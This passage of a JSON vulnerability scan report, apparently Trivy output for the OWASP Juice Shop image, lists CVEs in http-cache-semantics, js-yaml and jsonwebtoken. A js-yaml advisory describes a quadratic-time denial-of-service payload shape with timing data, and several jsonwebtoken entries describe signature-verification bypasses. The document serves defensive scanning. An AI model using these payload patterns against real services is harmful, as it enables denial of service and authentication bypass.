"https://bugzilla.redhat.com/2134609", + "https://bugzilla.redhat.com/2156324", + "https://bugzilla.redhat.com/2165824", + "https://bugzilla.redhat.com/2168631", + "https://bugzilla.redhat.com/2170644", + "https://bugzilla.redhat.com/2171935", + "https://bugzilla.redhat.com/2172217", + "https://bugzilla.redhat.com/show_bug.cgi?id=2165824", + "https://bugzilla.redhat.com/show_bug.cgi?id=2168631", + "https://bugzilla.redhat.com/show_bug.cgi?id=2171935", + "https://bugzilla.redhat.com/show_bug.cgi?id=2172190", + "https://bugzilla.redhat.com/show_bug.cgi?id=2172204", + "https://bugzilla.redhat.com/show_bug.cgi?id=2172217", + "https://bugzilla.redhat.com/show_bug.cgi?id=2178076", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-25881", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4904", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-23918", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-23920", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-23936", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-24807", + "https://errata.almalinux.org/8/ALSA-2023-1743.html", + "https://errata.rockylinux.org/RLSA-2023:2655", + "https://github.com/kornelski/http-cache-semantics", + "https://github.com/kornelski/http-cache-semantics/blob/master/index.js%23L83", + "https://github.com/kornelski/http-cache-semantics/commit/560b2d8ef452bbba20ffed69dc155d63ac757b74", + "https://linux.oracle.com/cve/CVE-2022-25881.html", + "https://linux.oracle.com/errata/ELSA-2023-2655.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-25881", + "https://security.netapp.com/advisory/ntap-20230622-0008", + "https://security.netapp.com/advisory/ntap-20230622-0008/", + "https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-3253332", + "https://security.snyk.io/vuln/SNYK-JS-HTTPCACHESEMANTICS-3248783", + "https://www.cve.org/CVERecord?id=CVE-2022-25881" + ], + "PublishedDate": "2023-01-31T05:15:11.81Z", + "LastModifiedDate": "2025-03-27T18:17:13Z" + }, + { + "VulnerabilityID": "CVE-2026-53550", + "VendorIDs": [ + "GHSA-h67p-54hq-rp68" + ], + "PkgID": "js-yaml@3.14.2", + "PkgName": "js-yaml", + "PkgPath": "juice-shop/node_modules/js-yaml/package.json", + "PkgIdentifier": { + "PURL": "pkg:npm/js-yaml@3.14.2", + "UID": "e7b5eca6735fcccd" + }, + "InstalledVersion": "3.14.2", + "FixedVersion": "4.2.0", + "Status": "fixed", + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-53550", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:994efc18752cac8ba0df9bf63b79c4659b00557d2c78230539fbd5767af50658", + "Title": "JS-YAML: Quadratic-complexity DoS in merge key handling via repeated aliases", + "Description": "### Summary\nA crafted YAML document can trigger algorithmic CPU exhaustion in `js-yaml` merge-key processing (`\u003c\u003c`) by repeating the same alias many times in a merge sequence. \nThis causes quadratic parse-time behavior relative to input size and can block a Node.js worker/event loop for seconds with a relatively small payload (tens of KB), resulting in denial of service.\n\n### Details\nThe issue is in merge handling inside `lib/loader.js`:\n\n- `storeMappingPair(...)` iterates every element of a merge sequence when key tag is `tag:yaml.org,2002:merge`.\n- For each element, it calls `mergeMappings(...)`.\n- `mergeMappings(...)` computes `Object.keys(source)` and performs `_hasOwnProperty.call(destination, key)` checks for each key.\n\nWhen input is of the form:\n\na: \u0026a {k0:0, k1:0, ..., kK:0}\nb: {\u003c\u003c: [*a, *a, *a, ... repeated M times ...]}\nall *a entries refer to the same anchored object. After the first merge, subsequent merges are semantically no-ops, but the parser still reprocesses all keys each time.\nResulting work is O(K * M), while input size is O(K + M), giving quadratic scaling as payload grows.\nRelevant code path:\nlib/loader.js in storeMappingPair(...) merge branch (keyTag === 'tag:yaml.org,2002:merge')\nlib/loader.js mergeMappings(...)\n\n\n### Root cause\nFile: lib/loader.js\nFunction: storeMappingPair(state, _result, overridableKeys, keyTag, keyNode,\n valueNode, startLine, startLineStart, startPos)\nLines: ~359-366\n\n if (keyTag === 'tag:yaml.org,2002:merge') {\n if (Array.isArray(valueNode)) {\n for (index = 0, quantity = valueNode.length; index \u003c quantity; index += 1) {\n mergeMappings(state, _result, valueNode[index], overridableKeys);\n }\n } else {\n mergeMappings(state, _result, valueNode, overridableKeys);\n }\n }\n\nWhen the merge value is a sequence (YAML 1.1 \u003c\u003c: [ *a, *a, ... ]), each element\nis handed to mergeMappings() without deduplication. mergeMappings() then does\n\n sourceKeys = Object.keys(source);\n for (index = 0; index \u003c sourceKeys.length; index += 1) {\n key = sourceKeys[index];\n if (!_hasOwnProperty.call(destination, key)) {\n setProperty(destination, key, source[key]);\n overridableKeys[key] = true;\n }\n }\n\nEvery alias reference in the sequence resolves (by design) to the SAME object\nvia state.anchorMap. After the first merge, every subsequent merge of that same\nreference is a pure no-op semantically, but still performs:\n\n * one Object.keys(source) call (O(K))\n * K _hasOwnProperty.call checks on the destination\n\nTotal: M * K hasOwnProperty checks + M Object.keys allocations, while the final\nobject and all observable side effects are identical to a single merge.\n\nYAML semantics for `\u003c\u003c:` are idempotent and commutative over duplicate sources,\nso collapsing duplicates preserves behavior exactly; this isn't a spec trade-off.\n\n\n### PoC\nEnvironment:\njs-yaml version: 4.1.1\nNode.js: v24.5.0\nPlatform: arm64 macOS (reproduced consistently)\nReproduction script:\nCreate many keys in one anchored map (\u0026a).\nMerge that same alias repeatedly via \u003c\u003c: [*a, *a, ...].\nMeasure parse time and compare with control payload using single merge (\u003c\u003c: *a).\nObserved repeated runs (same machine):\nK=M=1000, input 9,909 bytes: ~33–36 ms\nK=M=2000, input 20,909 bytes: ~121–123 ms\nK=M=4000, input 42,909 bytes: ~524–537 ms\nK=M=6000, input 64,909 bytes: ~1,608–1,829 ms\nK=M=8000, input 86,909 bytes: ~3,395–3,565 ms\nControl (single merge, similar key counts):\nK=2000: ~1–2 ms\nK=4000: ~3 ms\nK=8000: ~5 ms\nAlso verified: repeated-merge output equals single-merge output (same key count and same JSON), confirming excess time is redundant computation.\n\n\n### Impact\nThis is a denial-of-service vulnerability (CPU exhaustion / algorithmic complexity).\nAny service parsing untrusted YAML with js-yaml can be impacted, including API backends, CI tools, config processors, and automation services. An attacker can submit crafted YAML to significantly increase CPU time and reduce availability.\n\n### Suggested fix:\nDedupe the merge source list by reference before invoking mergeMappings. Any of\nthe following are minimal and preserve YAML 1.1 merge semantics:\n\ndedupe in storeMappingPair:\n\n if (keyTag === 'tag:yaml.org,2002:merge') {\n if (Array.isArray(valueNode)) {\n var seen = new Set();\n for (index = 0, quantity = valueNode.length; index \u003c quantity; index += 1) {\n var src = valueNode[index];\n if (seen.has(src)) continue; // idempotent; skip redundant alias\n seen.add(src);\n mergeMappings(state, _result, src, overridableKeys);\n }\n } else {\n mergeMappings(state, _result, valueNode, overridableKeys);\n }\n }", + "Severity": "MEDIUM", + "VendorSeverity": { + "ghsa": 2 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "V3Score": 5.3 + } + }, + "References": [ + "https://github.com/nodeca/js-yaml", + "https://github.com/nodeca/js-yaml/security/advisories/GHSA-h67p-54hq-rp68" + ] + }, + { + "VulnerabilityID": "CVE-2015-9235", + "VendorIDs": [ + "GHSA-c7hr-j4mj-j2w6" + ], + "PkgID": "jsonwebtoken@0.1.0", + "PkgName": "jsonwebtoken", + "PkgPath": "juice-shop/node_modules/express-jwt/node_modules/jsonwebtoken/package.json", + "PkgIdentifier": { + "PURL": "pkg:npm/jsonwebtoken@0.1.0", + "UID": "313e8c07b7bef48a" + }, + "InstalledVersion": "0.1.0", + "FixedVersion": "4.2.2", + "Status": "fixed", + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2015-9235", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:03c0d1a7979cdbaf97887dc1a9fef7b77337ffecc23c67947794cd59b88c2ab6", + "Title": "nodejs-jsonwebtoken: verification step bypass with an altered token", + "Description": "In jsonwebtoken node module before 4.2.2 it is possible for an attacker to bypass verification when a token digitally signed with an asymmetric key (RS/ES family) of algorithms but instead the attacker send a token digitally signed with a symmetric algorithm (HS* family).", + "Severity": "CRITICAL", + "CweIDs": [ + "CWE-20", + "CWE-327" + ], + "VendorSeverity": { + "ghsa": 4, + "nvd": 4, + "redhat": 3 + }, + "CVSS": { + "nvd": { + "V2Vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P", + "V3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "V2Score": 7.5, + "V3Score": 9.8 + }, + "redhat": { + "V3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "V3Score": 7.3 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2015-9235", + "https://auth0.com/blog/2015/03/31/critical-vulnerabilities-in-json-web-token-libraries", + "https://auth0.com/blog/2015/03/31/critical-vulnerabilities-in-json-web-token-libraries/", + "https://github.com/advisories/GHSA-c7hr-j4mj-j2w6", + "https://github.com/auth0/node-jsonwebtoken/commit/1bb584bc382295eeb7ee8c4452a673a77a68b687", + "https://nodesecurity.io/advisories/17", + "https://nvd.nist.gov/vuln/detail/CVE-2015-9235", + "https://www.cve.org/CVERecord?id=CVE-2015-9235", + "https://www.npmjs.com/advisories/17", + "https://www.timmclean.net/2015/02/25/jwt-alg-none.html" + ], + "PublishedDate": "2018-05-29T20:29:00.33Z", + "LastModifiedDate": "2024-11-21T02:40:07.1Z" + }, + { + "VulnerabilityID": "CVE-2022-23539", + "VendorIDs": [ + "GHSA-8cf7-32gw-wr33" + ], + "PkgID": "jsonwebtoken@0.1.0", + "PkgName": "jsonwebtoken", + "PkgPath": "juice-shop/node_modules/express-jwt/node_modules/jsonwebtoken/package.json", + "PkgIdentifier": { + "PURL": "pkg:npm/jsonwebtoken@0.1.0", + "UID": "313e8c07b7bef48a" + }, + "InstalledVersion": "0.1.0", + "FixedVersion": "9.0.0", + "Status": "fixed", + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2022-23539", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:85409f73f524ee1817f9f9bbea569cbdac745f44d8627b130b6adb7e8eac43f2", + "Title": "jsonwebtoken: Unrestricted key type could lead to legacy keys usagen", + "Description": "Versions `\u003c=8.5.1` of `jsonwebtoken` library could be misconfigured so that legacy, insecure key types are used for signature verification. For example, DSA keys could be used with the RS256 algorithm. You are affected if you are using an algorithm and a key type other than a combination listed in the GitHub Security Advisory as unaffected. This issue has been fixed, please update to version 9.0.0. This version validates for asymmetric key type and algorithm combinations. Please refer to the above mentioned algorithm / key type combinations for the valid secure configuration. After updating to version 9.0.0, if you still intend to continue with signing or verifying tokens using invalid key type/algorithm value combinations, you’ll need to set the `allowInvalidAsymmetricKeyTypes` option to `true` in the `sign()` and/or `verify()` functions.", + "Severity": "HIGH", + "CweIDs": [ + "CWE-327" + ], + "VendorSeverity": { + "ghsa": 3, + "nvd": 3, + "redhat": 2 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", + "V3Score": 8.1 + }, + "nvd": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", + "V3Score": 8.1 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", + "V3Score": 8.1 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2022-23539", + "https://github.com/auth0/node-jsonwebtoken", + "https://github.com/auth0/node-jsonwebtoken/commit/e1fa9dcc12054a8681db4e6373da1b30cf7016e3", + "https://github.com/auth0/node-jsonwebtoken/security/advisories/GHSA-8cf7-32gw-wr33", + "https://nvd.nist.gov/vuln/detail/CVE-2022-23539", + "https://security.netapp.com/advisory/ntap-20240621-0007", + "https://security.netapp.com/advisory/ntap-20240621-0007/", + "https://www.cve.org/CVERecord?id=CVE-2022-23539" + ], + "PublishedDate": "2022-12-23T00:15:12.347Z", + "LastModifiedDate": "2024-11-21T06:48:46.303Z" + }, + { + "VulnerabilityID": "NSWG-ECO-17", + "PkgID": "jsonwebtoken@0.1.0", + "PkgName": "jsonwebtoken", + "PkgPath": "juice-shop/node_modules/express-jwt/node_modules/jsonwebtoken/package.json", + "PkgIdentifier": { + "PURL": "pkg:npm/jsonwebtoken@0.1.0", + "UID": "313e8c07b7bef48a" + }, + "InstalledVersion": "0.1.0", + "FixedVersion": "\u003e=4.2.2", + "Status": "fixed", + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "SeveritySource": "nodejs-security-wg", + "DataSource": { + "ID": "nodejs-security-wg", + "Name": "Node.js Ecosystem Security Working Group", + "URL": "https://github.com/nodejs/security-wg" + }, + "Fingerprint": "sha256:b97e82fe85c11c42a78ba84ef5758508b9a3938ed2aa5ff06b0a1632807282a5", + "Title": "Verification Bypass", + "Description": "It is possible for an attacker to bypass verification when \"a token digitally signed with an asymetric key (RS/ES family) of algorithms but instead the attacker send a token digitally signed with a symmetric algorithm (HS* family)\" [1]", + "Severity": "HIGH", + "VendorSeverity": { + "nodejs-security-wg": 3 + }, + "References": [ + "https://auth0.com/blog/2015/03/31/critical-vulnerabilities-in-json-web-token-libraries/", + "https://github.com/auth0/node-jsonwebtoken/commit/1bb584bc382295eeb7ee8c4452a673a77a68b687", + "https://www.timmclean.net/2015/02/25/jwt-alg-none.html" + ] + }, + { + "VulnerabilityID": "CVE-2022-23540", + "VendorIDs": [ + "GHSA-qwph-4952-7xr6" + ], + "PkgID": "jsonwebtoken@0.1.0", + "PkgName": "jsonwebtoken", + "PkgPath": "juice-shop/node_modules/express-jwt/node_modules/jsonwebtoken/package.json", + "PkgIdentifier": { + "PURL": "pkg:npm/jsonwebtoken@0.1.0", + "UID": "313e8c07b7bef48a" + }, + "InstalledVersion": "0.1.0", + "FixedVersion": "9.0.0", + "Status": "fixed", + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2022-23540", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:e600e681ca92a0224153282c953ea015fd748749f510b0305c7da9bf6b9c3155", + "Title": "jsonwebtoken: Insecure default algorithm in jwt.verify() could lead to signature validation bypass", + "Description": "In versions `\u003c=8.5.1` of `jsonwebtoken` library, lack of algorithm definition in the `jwt.verify()` function can lead to signature validation bypass due to defaulting to the `none` algorithm for signature verification. Users are affected if you do not specify algorithms in the `jwt.verify()` function. This issue has been fixed, please update to version 9.0.0 which removes the default support for the none algorithm in the `jwt.verify()` method. There will be no impact, if you update to version 9.0.0 and you don’t need to allow for the `none` algorithm. If you need 'none' algorithm, you have to explicitly specify that in `jwt.verify()` options.", + "Severity": "MEDIUM", + "CweIDs": [ + "CWE-287", + "CWE-347" + ], + "VendorSeverity": { + "ghsa": 2, + "nvd": 3, + "redhat": 2 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:L", + "V3Score": 6.4 + }, + "nvd": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:L", + "V3Score": 7.6 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:L", + "V3Score": 6.4 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2022-23540", + "https://github.com/auth0/node-jsonwebtoken", + "https://github.com/auth0/node-jsonwebtoken/commit/e1fa9dcc12054a8681db4e6373da1b30cf7016e3", + "https://github.com/auth0/node-jsonwebtoken/security/advisories/GHSA-qwph-4952-7xr6", + "https://nvd.nist.gov/vuln/detail/CVE-2022-23540", + "https://security.netapp.com/advisory/ntap-20240621-0007", + "https://security.netapp.com/advisory/ntap-20240621-0007/", + "https://www.cve.org/CVERecord?id=CVE-2022-23540" + ], + "PublishedDate": "2022-12-22T19:15:08.967Z", + "LastModifiedDate": "2025-02-13T17:15:38.32Z" + }, + { + "VulnerabilityID": "CVE-2022-23541", + "VendorIDs": [ + "GHSA-hjrf-2m68-5959" + ], + "PkgID": "jsonwebtoken@0.1.0", + "PkgName": "jsonwebtoken", + "PkgPath": "juice-shop/node_modules/express-jwt/node_modules/jsonwebtoken/package.json", + "PkgIdentifier": { + "PURL": "pkg:npm/jsonwebtoken@0.1.0", + "UID": "313e8c07b7bef48a" + }, + "InstalledVersion": "0.1.0", + "FixedVersion": "9.0.0", + "Status": "fixed", + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2022-23541", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:1edf8d0d73bb475ba0077608de003cce6ef2d454c2ba9e4f3e678b9e6b9e2e6c", + "Title": "jsonwebtoken: Insecure implementation of key retrieval function could lead to Forgeable Public/Private Tokens from RSA to HMAC", + "Description": "jsonwebtoken is an implementation of JSON Web Tokens. Versions `\u003c= 8.5.1` of `jsonwebtoken` library can be misconfigured so that passing a poorly implemented key retrieval function referring to the `secretOrPublicKey` argument from the readme link will result in incorrect verification of tokens. There is a possibility of using a different algorithm and key combination in verification, other than the one that was used to sign the tokens. Specifically, tokens signed with an asymmetric public key could be verified with a symmetric HS256 algorithm. This can lead to successful validation of forged tokens. If your application is supporting usage of both symmetric key and asymmetric key in jwt.verify() implementation with the same key retrieval function. This issue has been patched, please update to version 9.0.0.", + "Severity": "MEDIUM", + "CweIDs": [ + "CWE-287", + "CWE-1259" + ], + "VendorSeverity": { + "ghsa": 2, + "nvd": 2, + "redhat": 2 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L", + "V3Score": 5 + }, + "nvd": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", + "V3Score": 6.3 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L", + "V3Score": 5 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2022-23541", + "https://github.com/auth0/node-jsonwebtoken", + "https://github.com/auth0/node-jsonwebtoken/commit/e1fa9dcc12054a8681db4e6373da1b30cf7016e3", + "https://github.com/auth0/node-jsonwebtoken/releases/tag/v9.0.0", + "https://github.com/auth0/node-jsonwebtoken/security/advisories/GHSA-hjrf-2m68-5959", + "https://nvd.nist.gov/vuln/detail/CVE-2022-23541", + "https://security.netapp.com/advisory/ntap-20240621-0007", + "https://security.netapp.com/advisory/ntap-20240621-0007/", + "https://www.cve.org/CVERecord?id=CVE-2022-23541" + ], + "PublishedDate": "2022-12-22T18:15:09.39Z", + "LastModifiedDate": "2024-11-21T06:48:46.58Z" + }, + { + "VulnerabilityID": "CVE-2015-9235", + "VendorIDs": [ + "GHSA-c7hr-j4mj-j2w6" + ], + "PkgID": "jsonwebtoken@0.4.0", + "PkgName": "jsonwebtoken", + "PkgPath": "juice-shop/node_modules/jsonwebtoken/package.json", + "PkgIdentifier": { + "PURL": "pkg:npm/jsonwebtoken@0.4.0", + "UID": "57a7893154ba8d85" + }, + "InstalledVersion": "0.4.0", + "FixedVersion": "4.2.2", + "Status": "fixed", + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2015-9235", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:1992012f9d0960334473be27594293c5f757f3eac1da7053f8fdd8b80f398a22", + "Title": "nodejs-jsonwebtoken: verification step bypass with an altered token", + "Description": "In jsonwebtoken node module before 4.2.2 it is possible for an attacker to bypass verification when a token digitally signed with an asymmetric key (RS/ES family) of algorithms but instead the attacker send a token digitally signed with a symmetric algorithm (HS* family).", + "Severity": "CRITICAL", + "CweIDs": [ + "CWE-20", + "CWE-327" + ], + "VendorSeverity": { + "ghsa": 4, + "nvd": 4, + "redhat": 3 + }, + "CVSS": { + "nvd": { + "V2Vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P", + "V3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "V2Score": 7.5, + "V3Score": 9.8 + }, + "redhat": { + "V3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "V3Score": 7.3 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2015-9235", + "https://auth0.com/blog/2015/03/31/critical-vulnerabilities-in-json-web-token-libraries", + "https://auth0.com/blog/2015/03/31/critical-vulnerabilities-in-json-web-token-libraries/", + "https://github.com/advisories/GHSA-c7hr-j4mj-j2w6", + "https://github.com/auth0/node-jsonwebtoken/commit/1bb584bc382295eeb7ee8c4452a673a77a68b687", + "https://nodesecurity.io/advisories/17", + "https://nvd.nist.gov/vuln/detail/CVE-2015-9235", + "https://www.cve.org/CVERecord?id=CVE-2015-9235", + "https://www.npmjs.com/advisories/17", + "https://www.timmclean.net/2015/02/25/jwt-alg-none.html" + ], + "PublishedDate": "2018-05-29T20:29:00.33Z", + "LastModifiedDate": "2024-11-21T02:40:07.1Z" + }, + { + "VulnerabilityID": "CVE-2022-23539", + "VendorIDs": [ + "GHSA-8cf7-32gw-wr33" + ], + "PkgID": "jsonwebtoken@0.4.0", + "PkgName": "jsonwebtoken", + "PkgPath": "juice-shop/node_modules/jsonwebtoken/package.json", + "PkgIdentifier": { + "PURL": "pkg:npm/jsonwebtoken@0.4.0", + "UID": "57a7893154ba8d85" + }, + "InstalledVersion": "0.4.0", + "FixedVersion": "9.0.0", + "Status": "fixed", + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2022-23539", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:7120d1d541217eccc7b903430d2786ea01695868512b60543dbcd0a92412148e", + "Title": "jsonwebtoken: Unrestricted key type could lead to legacy keys usagen", + "Description": "Versions `\u003c=8.5.1` of `jsonwebtoken` library could be misconfigured so that legacy, insecure key types are used for signature verification. For example, DSA keys could be used with the RS256 algorithm. You are affected if you are using an algorithm and a key type other than a combination listed in the GitHub Security Advisory as unaffected. This issue has been fixed, please update to version 9.0.0. This version validates for asymmetric key type and algorithm combinations. Please refer to the above mentioned algorithm / key type combinations for the valid secure configuration. After updating to version 9.0.0, if you still intend to continue with signing or verifying tokens using invalid key type/algorithm value combinations, you’ll need to set the `allowInvalidAsymmetricKeyTypes` option to `true` in the `sign()` and/or `verify()` functions.", + "Severity": "HIGH", + "CweIDs": [ + "CWE-327" + ], + "VendorSeverity": { + "ghsa": 3, + "nvd": 3, + "redhat": 2 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", + "V3Score": 8.1 + }, + "nvd": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", + "V3Score": 8.1 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", + "V3Score": 8.1 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2022-23539", + "https://github.com/auth0/node-jsonwebtoken", + "https://github.com/auth0/node-jsonwebtoken/commit/e1fa9dcc12054a8681db4e6373da1b30cf7016e3", + "https://github.com/auth0/node-jsonwebtoken/security/advisories/GHSA-8cf7-32gw-wr33", + "https://nvd.nist.gov/vuln/detail/CVE-2022-23539", + "https://security.netapp.com/advisory/ntap-20240621-0007", + "https://security.netapp.com/advisory/ntap-20240621-0007/", + "https://www.cve.org/CVERecord?id=CVE-2022-23539" + ], + "PublishedDate": "2022-12-23T00:15:12.347Z", + "LastModifiedDate": "2024-11-21T06:48:46.303Z" + }, + { + "VulnerabilityID": "NSWG-ECO-17", + "PkgID": "jsonwebtoken@0.4.0", + "PkgName": "jsonwebtoken", + "PkgPath": "juice-shop/node_modules/jsonwebtoken/package.json", + "PkgIdentifier": { + "PURL": "pkg:npm/jsonwebtoken@0.4.0", + "UID": "57a7893154ba8d85" + }, + "InstalledVersion": "0.4.0", + "FixedVersion": "\u003e=4.2.2", + "Status": "fixed", + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "SeveritySource": "nodejs-security-wg", + "DataSource": { + "ID": "nodejs-security-wg", + "Name": "Node.js Ecosystem Security Working Group", + "URL": "https://github.com/nodejs/security-wg" + }, + "Fingerprint": "sha256:b72e851b25b09387c45c66358cb0689a4616f6523e17556c3f4df87d3e8348d3", + "Title": "Verification Bypass", + "Description": "It is possible for an attacker to bypass verification when \"a token digitally signed with an asymetric key (RS/ES family) of algorithms but instead the attacker send a token digitally signed with a symmetric algorithm (HS* family)\" [1]", + "Severity": "HIGH", + "VendorSeverity": { + "nodejs-security-wg": 3 + }, + "References": [ + "https://auth0.com/blog/2015/03/31/critical-vulnerabilities-in-json-web-token-libraries/", + "https://github.com/auth0/node-jsonwebtoken/commit/1bb584bc382295eeb7ee8c4452a673a77a68b687", + "https://www.timmclean.net/2015/02/25/jwt-alg-none.html" + ] + }, + { + "VulnerabilityID": "CVE-2022-23540", + "VendorIDs": [ + "GHSA-qwph-4952-7xr6" + ], + "PkgID": "jsonwebtoken@0.4.0", + "PkgName": "jsonwebtoken", + "PkgPath": "juice-shop/node_modules/jsonwebtoken/package.json", + "PkgIdentifier": { + "PURL": "pkg:npm/jsonwebtoken@0.4.0", + "UID": "57a7893154ba8d85" + }, + "InstalledVersion": "0.4.0", + "FixedVersion": "9.0.0", + "Status": "fixed", + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2022-23540", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:1ba05ab3cc7a33691320bf016b07d414a23856333ae651cf2feb8cecaaf741b7", + "Title": "jsonwebtoken: Insecure default algorithm in jwt.verify() could lead to signature validation bypass", + "Description": "In versions 